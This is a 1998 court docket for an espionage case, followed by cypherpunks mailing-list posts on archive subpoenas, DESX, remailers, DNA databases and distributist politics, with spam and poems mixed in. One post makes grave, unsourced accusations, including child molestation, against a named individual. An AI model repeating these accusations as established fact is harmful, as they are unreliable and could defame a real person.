USA v. Boone                                                Filed: 10/13/98
Dkt# in other court: None

Case Assigned to:  Magistrate Judge Theresa Carroll Buchanan

DAVID SHELDON BOONE (1)
     defendant

Defendant Assigned to:  Magistrate Judge W. Curtis Sewell

Pending Counts:

   NONE


Terminated Counts:

   NONE



Complaints                               Disposition

18:794(a) and 3238   Espionage



U. S. Attorneys:

  Charles Rosenberg
  [COR LD NTC]
  U.S. Attorney's Office
  2100 Jamieson Avenue
  Alexandria, VA 22314
  (703) 299-3700
  FTS 574-3700




Docket as of October 13, 1998 6:21 pm               Page 2

Proceedings include all events.
1:98m 882-ALL USA v. Boone

10/9/98  1       SEALED COMPLAINT as to David Sheldon Boone (avax)
                 [Entry date 10/13/98]

10/9/98  2       AFFIDAVIT by USA as to David Sheldon Boone  Re: [1-1]
                 complaint (avax) [Entry date 10/13/98]

10/9/98  3       MOTION by USA to Seal  search warrants [2-1] affidavit  by
                 USA, [1-1] complaint (avax) [Entry date 10/13/98]

10/9/98  4       ORDER as to David Sheldon Boone granting [3-1] motion by
                 USA to Seal  search warrants [2-1] affidavit  by USA, [1-1]
                 complaint as to David Sheldon Boone (1) ( Signed by
                 Magistrate Judge Theresa C. Buchanan )  Copies Mailed: yes
                 (avax) [Entry date 10/13/98]

10/9/98  --       Arrest WARRANT issued as to David Sheldon Boone (avax)
                 [Entry date 10/13/98]

10/13/98 5       ORDER as to David Sheldon Boone,  Unsealing Complaint
                 Search Warrants, and affidavit ( Signed by Magistrate
                 Judge W. C. Sewell )  Copies Mailed: yes (avax)
                 [Entry date 10/13/98]

10/13/98 --      Complaint unsealed as to David Sheldon Boone (avax)
                 [Entry date 10/13/98]

10/13/98 --      Initial appearance as to David Sheldon Boone  held  before
                 Magistrate Judge W. C. Sewell ( Tape #266.)  USA appeared
                 through: T. Connolly.  Dft(s) appeared through: w/attys;
                 Sinlair and Clark (Defendant informed of rights.)  US
                 motions for detention-granted.  Deft. waives PH reserves the
                 right to a bond hearing at a later date.  Deft. is remanded
                 to the custody of the USMS w/o bond pending action og the
                 GJ. (ntho) [Entry date 10/13/98] [Edit date 10/13/98]

10/13/98 6       Waiver of Preliminary Examination or Hearing by David
                 Sheldon Boone (ntho) [Entry date 10/13/98]

[END OF DOCKET: 1:98m 882-0]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Oct 1998 05:16:42 +0800
To: cypherpunks@cyberpass.net
Subject: IRS wants cypherpunks archives
Message-ID: <199810132040.VAA12715@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jeff, and fellow agents seem to be interested in cypherpunks archives
(as evidenced by asking Jim Choate who operates one of the mailing
list nodes, but who does _not_ offer archived list traffic).  Jeff is
Cc'd on this post to be helpful (who says cypherpunks aren't helpful
-- you only have to ask).

This archive seems to be operational:

	http://www.inet-one.com/cypherpunks/

And looks to cover the last year or so at least.

The one at minder.net says 0 items available:

	http://www.minder.net/cgi-bin/lwgate.cgi/CYPHERPUNKS/archives/	

so something appears wrong with that one (Brian?)

and Ryan's sof.mit.edu archive is down still since the disk crash.

Are there any others?

I do have a reasonable set of archives going back to May '96 in RMAIL
format, but am not too keen on mailing them due to bandwidth -- would
take a few hours at 28.8k baud.  (Also there seem to be some older
archives on Remo Pini's crypto CD, but I think they are too old to be
of interest to IRS).

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bodo_Moeller@public.uni-hamburg.de (Bodo Moeller)
Date: Wed, 14 Oct 1998 07:41:20 +0800
To: cypherpunks@sirius.infonex.com
Subject: Re: DESX
In-Reply-To: <19981010215151.A628@die.com>
Message-ID: <m0zTAQ4-0003b7C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



Dave Emery <die@die.com>:

> 	Anybody have any estimate as to how much actual strength this
> adds to DES ?

You might want to read "The Security of DESX" by Phillip Rogaway in
CryptoBytes Vol. 2 Number 2 (Summer 1996) pp 8-11, which is available
somewhere on RSADSI's web site <URL:http://www.rsa.com> (possibly
<URL:http://www.rsa.com/PUBS/> might be a good starting point) or the
underlying research paper "How to protect DES against exhaustive key
search" by Kilian and Rogaway in CRYPTO '96:

     [The] results don't say that it's impossible to build a machine
     which would break DESX in a reasonable amount of time.  But they
     do imply that such a machine would have to employ some radically
     new idea: it couldn't be a machine implementing a key-search
     attack, in the general sense which we've described.

(Quoted from the CryptoBytes article.)

>                How would one break it in a practical cracker machine ?

Maybe not at all; see above.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 14 Oct 1998 11:10:22 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: INFO-RUSS: moving to Chicago... (fwd)
Message-ID: <199810140252.VAA09655@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From INFO-RUSS-request@smarty.ece.jhu.edu Tue Oct 13 21:42:32 1998
Message-Id: <9810140035.AA02214@smarty.ece.jhu.edu>
Errors-To: INFO-RUSS-request@smarty.ece.jhu.edu
Sender: INFO-RUSS-request@smarty.ece.jhu.edu
From: MARGOL@newman.basnet.minsk.by
To: info-russ@smarty.ece.jhu.edu
Date:          Mon, 12 Oct 1998 11:18:47 +1200
Subject: INFO-RUSS: moving to Chicago...


---------------------------------------------------------------------
This is INFO-RUSS broadcast (1200+ subscribers). Home page, information, 
and archives: http://psi.ece.jhu.edu/~kaplan/IRUSS/inforuss.html
To post, or to subscribe/unsubscribe, mail to info-russ@smarty.ece.jhu.edu
INFO-RUSS assumes no responsibility for the information/views of its users.
---------------------------------------------------------------------

Hi!

1. I am going to move in Chicago in the end of this year and I am 
looking for a job there.

Brief information: Belarussian State University (mathamatics dep.), 
Ph.D. in mathematics (algebra, arithmetic geometry) in 1995, during 
some period was interested in algebraic methods in the image 
processing, now dealing with mathematical (algebraic and partially 
statistical) methods in data security (cryptography), programming 
experience in Visual C++ 5.0 (C++, MFC, DB, ActiveX by MFC). I 
am ready to sent my CV, list of my papers, and any other detailed 
information needed. 

I am also looking for colleagues everywhere!

2. By the way, in some info-russ letters the problem of e-mail 
privacy was discussed. I would like to write some words on that 
topic. There is always a great risk that your envelope can be opened 
before its arrival. And there is the unique way to keep the privacy:
encrypt the letter before sending. It is especially important, if 
your letter contains your bank account number, credit card number and 
so on. The same situation takes place in case of e-mail. The 
cheapest, simplest, and most reliable way is to apply some 
cryptosystem (with either public or private key). Good cryptosystems 
are totally practically unbreakable. You can use coding programs 
built in your Internet browser, in your e-mail program or separate 
encrypting-decrypting programs (for example, PGP). Attention: the 
export of crypto programs is strictly forbidden by the american law. 
But everyone can get such programs by Internet on the European 
servers without any restrictions. Some nice helpful books on that 
topic: 
- "Personal Computer Security" by Ed Tiley (for users),
- "Internet Security Secrets" by John R. Vacca (both for users and 
                                                     specialists),
- "Handbook of Applied Cryptography" by Alfred Menezes and others 
                                                 (for specialists).
Best regards,
               Genady.

     MARGOL@newman.basnet.minsk.by




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <sysadmin@mfn.org>
Date: Wed, 14 Oct 1998 12:24:29 +0800
To: "mail2news@basement.replay.com>
Subject: Gary Burnore vs. Earth (Was: Value of Annon. Remailers)
Message-ID: <01BDF6FA.C42BBEA0@noc.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



</LURK OFF>

First off, let us state up front that this is an aside to the previous
poster, and not totally on-point: feel free to hit the delete key, and
accept our apologies if this is a problem.

About two months ago, we met the infamous Burnore & Company while 
defending a semi-annonymous UseNet poster calling himself "Outlaw-Frog-Raper".
It seems that in classical Burnore style "OFR" found himself the sudden
victim of [literally] daily TOS/SPAM complaints by Burnore and Co. for making
use of UseNet to air his decidedly anti-police positions (it's odd how "pro
police" Burnore is, isn't it?).  

	Obviously, as defenders of this man's right to post material offensive
to Burnore, we too came under attack.  Fortunately, we have been with
our upstream provider for a long time, and are on *very* good terms: they told
Burnore to keep his complaints to himself.  But I digress...

	As this "war" intensified, we attempted to determine just who in the hell
this lunatic *was*, as nobody here is a regular Usenet follower (just when
we have our slow periods, we'll check in with the loons to kill a couple of
hours...).  To our surprise, we discovered that while Burnore/Databasix/etc.
are known far and wide, the actual traffic that passes between them and the rest
of the Earthly population is pretty well eradicated.  Here's a guy who has actually
sat down and deleted (according to DejaNews) *tens of thousands* of his -own- posts!
Not to mention the unknown number of posts which he has "thoughtfully taken care of
for those others who forgot to do so themselves"...

	The point here is that what little survives about this lunatic child
molester (he has even successfully had his North Carolina Sex Offender record
removed!), has almost all come through *some* annonymizer.  Whether a MixMaster,
or Cajones (RIP) "intentional annonymizer", or an "unintentional annonymizer" 
such as a large [cypherpunks] listserv with "bad headers".

	We submit that it only takes one successful argument, even though there be
a million such arguments available, to "proof" the value of an annoymous remailer.
we then extend the original Burnore story (presented in part below) in further
support.

Yes, I know, at least half of you are sitting here going "now why did they
bother us with that?".  The answer is we feel VERY strongly that if not for
what [little] we were able to find as a result of A/R's, we would never have
been able to figure this clown out at all.  And loco though he may be, he is
also a *prodigious* pain in the ass, who represents a real, true threat to
what little freedoms we still have in the US.  Burnore isn't a loner in the
political sense: he's actually becoming pretty mainstream.  If A/R's can help
to keep scum like him in the light, where he can't hide his hypocrises [sp?]
through a cancel or "DejaNuke", then they are one of our most important national
resources, and should be defended (and *funded*) as such!

Just our [very biased] $.02 worth...

The full-time [yet totally volunteer] staff of Missouri FreeNet:

	J.A. Terranson, sysadmin@mfn.org
	John Blau, jb214@mfn.org
	Beatrice Hynes, beatrice@mfn.org
	Frescenne "M", support@mfn.org
	A. Pates, support@mfn.org

</LURK ON>
---------------------------------------------------------------------

<huge brevity snippage>

Consider the episode last year with Gary Burnore and DataBasix vs.
Jeff Burchell and his Mailmasher and Huge Cajones machines.
Made-to-order abuse appeared right on cue to reinforce the claims
that Burnore and his girlfriend Belinda Bryan had made.  And now
we've learned the real truth behind the whole episode.  While Gary
Burnore was living with another girlfriend in Santa Clara, CA, he
was also molesting her teenaged daughter.  An anonymous
whistleblower attempted to warn the girl's mother as well as her
school officials by anonymous e-mail.  Burnore went ballistic and
falsely claimed "harassment".  But the whistleblower was ultimately
vindicated when Burnore pled guilty to the molestation charge, was
placed on probation, and was required to register as a sex offender.
Unable to silence the whistleblower, Burnore began a campaign of
harassment against the operators of the remailers that were being
used to expose him.  IOW, if you can't refute the message, shoot the
messenger.  And if you can't shoot the messenger, attempt to disable
his means of communication (the remailers net).

I recounted this case history, which can be researched in various
usenet archives by anyone interested, just to demonstrate that one
man's "harassment" can well be another man's investigative
journalism, even if the journalist or whistleblower is not in a
position to expose him/herself to retaliation by the wrongdoer,
which has been (coincidentally?) reported by virtually anyone who
has dared to challenge Gary Burnore publicly.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 14 Oct 1998 05:13:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What it's like to get a subpoena (re Toto)
Message-ID: <199810132044.WAA27037@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I haven't.

>I don't see why they're bothering you, I wonder if the other majordomo
>operators have received, or shortly will receive similar visits.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nym 2 <nym2@dongco.hyperreal.art.pl>
Date: Wed, 14 Oct 1998 08:15:40 +0800
To: "Bernie B. Terrado" <bbt@peak-two.uplb.edu.ph>
Subject: Re: question
In-Reply-To: <Pine.GSO.3.96.981007180419.18061B-100000@peak-two.uplb.edu.ph>
Message-ID: <19981013224540.15380.qmail@serek.arch.pwr.wroc.pl>
MIME-Version: 1.0
Content-Type: text/plain



"Bernie B. Terrado" <bbt@peak-two.uplb.edu.ph> wrote:

> traceroute, is it effective as ping or finger.
> what other info would I have to know about it

ping just tells you that a host is reachable. finger gives you information
on who is logged in, which real name is associated to an address etc.
traceroute gives you a list of hosts that are used to connect from your
site to the other host. you can use traceroute and whois to figure out
where a host is located, who is their isp, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 14 Oct 1998 11:39:35 +0800
To: cypherpunks@cyberpass.net
Subject: Aaron Debunks Crypto Myths
Message-ID: <199810140316.XAA17126@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Crypto emissary David Aaron gave a speech today in
Germany boosting US encryption policy for privacy and
commerce. Says it's an insult to claim US intelligence 
agencies want backdoor access and other untrue myths:

   http://jya.com/aaron101398.htm

-----

Thanks to JM for pointing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 14 Oct 1998 18:52:14 +0800
To: Anonymous <cypherpunks@cyberpass.net
Subject: Re: IP: ISPI Clips 5.35: F.B.I. Set to Begin Using National DNA Database
In-Reply-To: <199810132157.OAA10034@netcom13.netcom.com>
Message-ID: <3.0.5.32.19981014015357.00bbb580@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>  > Access to the DNA data base is permitted only for law enforcement
>  > purposes, with a $100,000 fine for unauthorized disclosures...

How long before somebody either subpoenas the database or
contests the use in a case in such a way as to drag the
entire contents through a court for a discovery process?


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: celltel@mailexcite.com
Date: Wed, 14 Oct 1998 18:24:41 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810140951.CAA16815@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




Hello!
This information is for those of you who make long 
distance calls FROM or TO overseas locations 
Worldwide, or who TRAVEL in the USA or Overseas.  
IF YOU ARE NOT INTERESTED, BE ASSURED YOU WILL NOT
RECEIVE ANY FURTHER MAILINGS FROM US.

           
            ARE YOU CURRENTLY ENJOYING THESE RATES??

Can You Call FROM these countries?
Can You Call TO these countries?
         At These Rates?
  United Kingdom @ 15/minute
  Sweden @ 18/minute
  Australia @ 22/minute
  Germany, or Netherlands @ 23/minute
  France @ 24/minute  
  Switzerland @ 25/minute
  Japan @ 36/minute
  Israel @ 37/minute
  Moscow @ 50/minute

These are just 10 examples of calling rates FROM these 
10 countries TO the USA or FROM the USA to these 10 countries!
You can call TO or FROM over 200 more countries to ANYWHERE.

You can also make calls out of your home or office in the USA
to anywhere in the world at the rates above, or you can call
anywhere in the USA AWAY of your USA home or office at 16 cents/minute.
There is no surcharge, no monthly fee, no minimums on this program
use, nor do you switch from your regular carrier to use this
service.

To Learn all about this service, and to obtain rates for 200 countries,
please write an email to CALLBACK@galaxymall.com. In the subject,
and body write SEND. You will receive information IMMEDIATELY.

Thank You!!

Regards,
Max Sklower, President
MS TELECOM, INC






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 14 Oct 1998 18:46:20 +0800
To: SDN <cypherpunks@cyberpass.net
Subject: Re: FYI: More on WebTV security
In-Reply-To: <v03102802b24934307011@[204.1.1.65]>
Message-ID: <3.0.5.32.19981014032345.00b67940@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:32 PM 10/13/98 -0700, SDN wrote:

>More relevant to the list, the threat model for the WebTV service/box is
>primarily concerned about loss of user data, forgotten passwords, and
>unsecured data over the public internet.  It's not worried about privacy
>from WebTV insiders.
>As a result, all user data is stored on the service, traffic to and from the
>box is encrypted, and data isn't hidden from the customer care people.

If it's not secure against insiders, then it's not only not secure against cops,
it's also not secure against crackers, unless Microsoft hsa let the
WebTV folks do a very good job of security.



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 14 Oct 1998 09:49:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: ISPI Clips 5.35: F.B.I. Set to Begin Using National DNA Database
In-Reply-To: <199810132157.OAA10034@netcom13.netcom.com>
Message-ID: <199810140129.DAA24367@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



NICHOLAS WADE writes

  > Access to the DNA data base is permitted only for law enforcement
  > purposes, with a $100,000 fine for unauthorized disclosures...

Is this supposed to be good news, or bad?
As usual, those with the greatest ability to misuse the data --
and the greatest desire to do so -- control the database.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 14 Oct 1998 10:01:25 +0800
To: cypherpunks@einstein.ssz.com
Subject: ATTN: BlackNet, sog's keys 4 sale
Message-ID: <199810140141.DAA25717@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear BlackNet,

TOTO Enterprises, Bienfait, Saskatchewan hereby offers
for sale sog's key under the BlackNet anonymous
information market.

Payments must be in anonymous ecash delivered to a
digital dead drop to be arranged later.

Or alternatively, we are willing to take bids in
bottles of Scotch delivered to TOTO Key Escrow
Services, Box 281, Bienfait, Saskatchewan SOC OMO.

Please find enclosed Son of Gomez's key.

Sincerely,

Toto

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

hDwDqeLyyFpa0WsBAYCBbyWMo5Iw6imvX1D2Y3GRp3kuCGnEbgPRmQTyOKHoiSoi
teyTpjuZNrAw9iGrvAamAAAEQShD47SVtGHkxHYI8BmXb+tvF65wOkOwClzYFjVL
cBAD7FcyE8JqWiKVu5+iYEGqqIWkbVX61RetGDSVaErIOESUcRPce5e5muzWMfhe
vFEaeu1IC3MnE3qmvEyJu6uTuQk/ahkLf5/l5ouprhIPs4yCxQhOM8WPIMy/pCuO
QnVgQ2g4vYDPYRb4bRZXw9cKoKpbfKcrST5SXkfNVrYoAQf8WozqdIMGeeDoVWLG
h7NjbtTsCbnO79DZm/b2fblKVQHVoJH+U60F2/b2WFx/JWDnacocJdfAzaeit3mJ
FSEcPo1R5JDkfm022MJ7vaSKPpGjIhWS+07kyPLFf0Au1spr23Sabvmznkm8AXZZ
tnUAjHY1PQvIqMwmZ+JZd5ihC72S1/b9mQwha/ICnwjCRSi3VJ9GJByiZ7Gpra09
UC8whkc6mVhJxXLzFoLKNvVg1nt5QXyRu7TpVjTgtTfusFhYkZ6sV6BMn6Rq1ppX
DLqsZ+XWgYWAjrLeJv4z743LpB+NPQQIM4gklyggCY51VlW26JmXOu9Zv+J58Nqx
O3S2MPaecYt/0yFKy80KdMYEAQycWaaWq00b4WIPzO/39oxhlAtdV7Xp9t5VFE9N
f3Xnc8hyqrcHlJWMro+xLaWofJv/45GE5jz+oCZ0L0s2hxhZf5I2fRro65RZeBJl
JNxuDl7iYAmUSXzH+taiHqZ4H9+6YLMxRVKHL4cFXUDIJ+JiUB+lFQy1GGaTh8YR
uXfAtjiew2bCqaUmov7phgzwjnZD4iiLWrR4z4IyA3xkvAaFrPgprBDmp6SaTX4E
Q43rrjgr+a/dc5vzm9rZ0BywIC60+1h7bz/Qu5jq0EAqitSXHHbjBbwxC8mAtjyK
HpG3917gWIgJk82N6sNWywLBJLmkWusLLj6Z3YKTixjhoFC01WDaPvX/nc2nBuJ+
qEaAmi7fwD1IlESiC2wpKOFUR1zRxkk1X7+n1fdDTyfl6XnhHkOfj2iMyID+PHl6
A+0a+io89tEUNslh/YefcX6pNNtbeeetr9ySzAM3pS+264b7Fi9bw+NpV2BgsaST
0u9Yspjv3uQHPa6g2zFXkMSYzsOqmK9lblw29djiOGAe8g/xH9Xww/IpItNTG2aa
St3AYPssbceylpwy8o1/mSgp5roaM6wQ//xkGSkIoPV3I9bdPckgo/IKJEuaLh0d
XT7JGxHvG+Bb1jU/nPIod4YJIAPR8nKGwSGaHq/RyKXyVr7k7HQTqs+wrZ53zvEb
HTqFOAa1oiYGJyyIiO73yeedYcXnc0uW77RqaBqQA0+ViTAs69GD2piK1sEzBP5J
mDxeQvseR0H/i84bkGLUsHRcV/b/CoAmn+sbvSFRrtsO5G5gvejqJpZR69qMIo/J
afwGLv3K/O1YVACKJme+3xHTEiGrCu3BfYoLDNdl0ubYqW0DSmOXyuhtcn+JlNoa
GOsu7Q==
=MILa
-----END PGP MESSAGE-----
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 14 Oct 1998 20:41:46 +0800
To: mmotyka@lsil.com>
Subject: RE: DNA
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F84D3@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Mike Motyka wrote: 

> I'm not a biochemist 

Neither am I but I'm going to classes... 

> I think modern DNA analysis yields data that bear more 
> resemblance to a spectrum than anything else. In this 
> case there is always a good possibility for error.
>  Remember how large a project the Human Genome
> thing is? That is an actual sequencing project.

AFAIK police & courts don't  use actual sequencing but DNA "typing" or
"fingerprinting" - they extract certain well-known genes, a tiny subset
of all that are there, and compare them with reference samples. You
don't have to actually  "read" a gene to be able to match it with
another one.  The genes they used aren't ones that are expressed either.
They are if you like the "comments in the code".  Or more likely
graffitti because they don't seem to mean much.

You can't "prove" that a sample did come from a named individual, but
you can prove that it *didn't*. Which is why DNA testing has been
popular with defence lawyers in this country (UK) because it has been
used by the defence to get people released in a number of famous trials.
(There was one poor bloke who got let out of prison after over 20 years
when DNA typing showed he couldn't have committed the crime for which he
had been convivted. He hadn't been released on parole because to get
parole you have to show some contrition and he always claimed he was
innocent).

You can give a likelihood that a sample came from the same person as
another sample though. Or their twin, or parents et.c et.c. It's also
been used to get past our notoriously racist immigration officials. They
tend to assume that anyone coming into this country as the spouse or
parent of a citizen is lying (especially for Asians - they assume that
all marriage are arranged or "marriages of convenience" - for some
reason white Americans and especially Australians don't have nearly so
much trouble.). DNA typing has been used by immigrants to show that they
are (probably) the parent.

http://www.dartmouth.edu/~cbbc/courses/bio4/bio4-1997/KatieLachter.html
has some bumf about DNA evidence in US courts (you are much more
suspicios of it than we are)

http://www.emf.net/~iisme/actionplans/201.html has instructions for
do-it-yourself DNA typing! 
Unfortunatly  it requires equipment you are unlikely to have at home (&
do US universities  *really* issue such detailed instructions for lab
work? "Raise your hand. Move it over the pencil. Move it down until the
fingers are in contact with the pencil.  Close your fingers round the
pencil. Why is it important not to exert too much force with the
fingers? Pick up the pencil. Remember the point is sharp and may have
been exposed to potentially carcinogenic solvents. Do not stab any part
of yourself or any other student. Do not place the point near your eyes,
mouth or genitalia. Do not use the pencil in the presence of any minor
under the age of 18, or any vertebrate experimental animals, pets or
livestock. Do not hand the pencil to anyone not covered by the college's
insurance scheme or who has not signed the standard disclaimer form..."
OK, I exagerrate. But not much.)

Within 20 years techniques that are now restricted to university labs
and pharmeceutical companies will be available to the hobbyist. Maybe
bio-hacking will be as influential in our kids lives as computer-hacking
has been in ours.

> And pattern analysis will identify the guilty before they 
> even think about committing an offense. 
> Hell, they'll probably be able to ID the bad ones from 
> samples coerced/stolen at birth and then all future
>  opportunity and resource allocation will be effectively 
> decided by the government, inc.

Again, current methods don't identify genes just show how much they
resemble those of another sample. And they mostly use DNA that is not
transcribed anyway. So they tell you nothing about what a person looked
like.  Of course the stuff coming out of the genome project (which is
having the same effect on molecular biology that the cold war had on
rocket science, or the discovery of America on navigation, or the
railways had on steam technology) will probably change all that Real
Soon Now.  There are at least 3 or 4 new methiods that are being
introduced this year.

> Could it be that a single sample of DNA can be used
> to produce a large supply of that DNA which could then 
> be used to fabricate evidence? 

PCR can multiply the size of a sample many thousandfold in a day.

Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 14 Oct 1998 21:09:44 +0800
To: "Cypherpunks (E-mail)" <mgering@ecosystems.net>
Subject: RE: Two Jims, Werner and Matt redefine socialism for their own en ds
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F84D4@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Matthew James Gering[SMTP:mgering@ecosystems.net]  replied to a long
> rant, as by "Martinus Luther":
> 
>> something like Belloc and Chesterton's "distributivism".

> Distribute what and created by whom? Need I point out the 
> obvious fallacy that wealth is a static sum. It is not, wealth
> must be *created* before it exists to plunder and share.

Every libertarian or cypherpunk ought to have read "The Servile State"
by Hilaire Belloc.   It is long polemic against socialism (or what
Belloc thought was Socialism),   the welfare state & so on.  Your ranter
obviously hads read the book, and in that context what is being
distributed is *land*, as private property to be lived on, farmed and
passed on to children. 

> Abstract wealth and divorce it from the creator and you 
> eliminate the motive to create. You can only live from plundered
>  wealth so long before you slip into oblivion (see the Soviet Union).

I think Belloc would agree with you 100%. 
See http://www.cs.wesleyan.edu/HTML/Grad_links/mdemarco/gkc/distrib/ for
links to pages on Distributivism.  

Distributivism  is usually regarded as a right-wing, conservative
political philosophy.  Chesterton and Belloc didn't invent it but they
popularised it. It derived partly from a distaste for the State,
industry, trade unions and the modern  world in general; partly from an
admiration of traditional rural life; partly from the English Christian
Socialism of the 19th century & partly from the Biblical idea of the
Jubilee, when debts were cancelled  and the land redivided amongst the
families of the tribe.   It is based on the idea that only free men who
own their own land and house really have a stake in society or a chance
at a good life. So in an ideal world ownership of property would be
distributed as widely as possible (hence the name). 

Distributivists,  always a  small an uninfluential group, are divided as
to how this desirable state of affairs can be brought about. 

Some want to achieve it gradually, through education and legislation and
an increasing influence of the Roman Catholic church. These ones,
following in the footsteps of Belloc (an ultra-nationalist, an
anti-semite & in his old age a grumpy bigot), drifted farther and
farther  to the right, often becoming little different from Fascists.
Recently they have become associated with the "Third Way"  (i.e neither
Socialism not Capitalism) a confused mish-mash of political positions
that probably started as a self-justification by some milder Fascists
but is now associated with Tony Blair and the British "New Labour"
government.

Some other Distributivists thought that the people should rise up and
occupy the land, taking it from its current owners, whether the rich or
the state. This philosophy is pretty indistinguishable from the English
far-left Socialism of people like William Morris, drawing inspiration
from agrarian revolts throughout history from the Peasant's Revolt to
Gerard Winstanley and the Diggers. It isn't very different - apart from
its explicitly Christian roots -  from the Syndicalism of Joe Hill and
the wobblies, or the position of some modern-day Left Anarchists such as
the ones associated with the Solidarity Federation. They often say the
same things, using different jargon. (The Distributivists looked
backward to the middle ages & mainly talked about land, agriculture and
small crafts. When they paid any attention to industry, other than to
say they didn't like it, they made vague handwavings about "guilds",
i.e. local  trade-based co-operatives, owning factories. The
Syndicalists looked forward to the 20th century, and were mainly
interested in industry. When they bothered to talk about agriculture
they wanted land farmed in small plots each by an owner occupier - "3
acres and a cow" again - except that in America where everything has to
be bigger they made it "30 acres and a cow") To be honest it isn't that
different from the position of a lot of Old Labour lefties like me -
except we aren't revolutionaries either which leaves us in a bit of a
fix...

Chesterton was never a Socialist and probably never a revolutionary  but
he was often a Liberal (in the English sense) and was at least on
speaking terms with Socialists and Anarchists (of whose politics he
disapproved greatly)

If you haven't read "The Servile State" you should.

In fact if you haven't read Belloc you should. Not a great writer, not
always even a good one, but very, very interesting. Of course I'm
biased. In the early years of this century Belloc and Chesterton  (&
many other writers such as Henry James,  Rudyard Kipling,  S. Fowler
Wright (you really have to be weird to remember him), E.C. Benson and
A.A. Milne (the Hundred Acre Wood is just 20 miles from where I was
born))  were almost fanatical admirers of my own home county of Sussex
in England :-)  And they  wrote some really OTT poetry to show how good
it all was.


Ken Brown (about as off-topic as you can get on a Tuesday).




The South Country

    When I am living in the Midlands 
      That are sodden and unkind, 
    I light my lamp in the evening: 
      My work is left behind; 
    And the great hills of the South Country 
      Come back into my mind. 

    The great hills of the South Country 
      They stand along the sea; 
    And it's there walking in the high woods 
      That I could wish to be, 
    And the men that were boys when I was a boy 
      Walking along with me. 

    The men that live in North England 
      I saw them for a day: 
    Their hearts are set upon the waste fells, 
      Their skies are fast and grey; 
    From their castle-walls a man may see 
      The mountains far away. 

    The men that live in West England 
      They see the Severn strong, 
    A-rolling on rough water brown 
      Light aspen leaves along. 
    They have the secret of the Rocks, 
      And the oldest kind of song. 

    But the men that live in the South Country 
      Are the kindest and most wise, 
    They get their laughter from the loud surf, 
      And the faith in their happy eyes 
    Comes surely from our Sister the Spring 
      When over the sea she flies; 
    The violets suddenly bloom at her feet, 
      She blesses us with surprise. 

    I never get between the pines 
      But I smell the Sussex air; 
    Nor I never come on a belt of sand 
      But my home is there. 
    And along the sky the line of the Downs 
      So noble and so bare. 

    A lost thing could I never find, 
      Nor a broken thing mend: 
    And I fear I shall be all alone 
      When I get towards the end. 
    Who will there be to comfort me 
      Or who will be my friend? 

    I will gather and carefully make my friends 
      Of the men of the Sussex Weald; 
    They watch the stars from silent folds, 
      They stiffly plough the field. 
    By them and the God of the South Country 
      My poor soul shall be healed. 

    If I ever become a rich man, 
      Or if ever I grow to be old, 
    I will build a house with deep thatch 
      To shelter me from the cold, 
    And there shall the Sussex songs be sung 
      And the story of Sussex told. 

    I will hold my house in the high wood 
      Within a walk of the sea, 
    And the men that were boys when I was a boy 
      Shall sit and drink with me. 

Matilda

Matilda told such Dreadful Lies,
It made one Gasp and Stretch one's Eyes;
Her Aunt, who, from her Earliest Youth,
Had kept a Strict Regard for Truth,
Attempted to Believe Matilda:
The effort very nearly killed her,
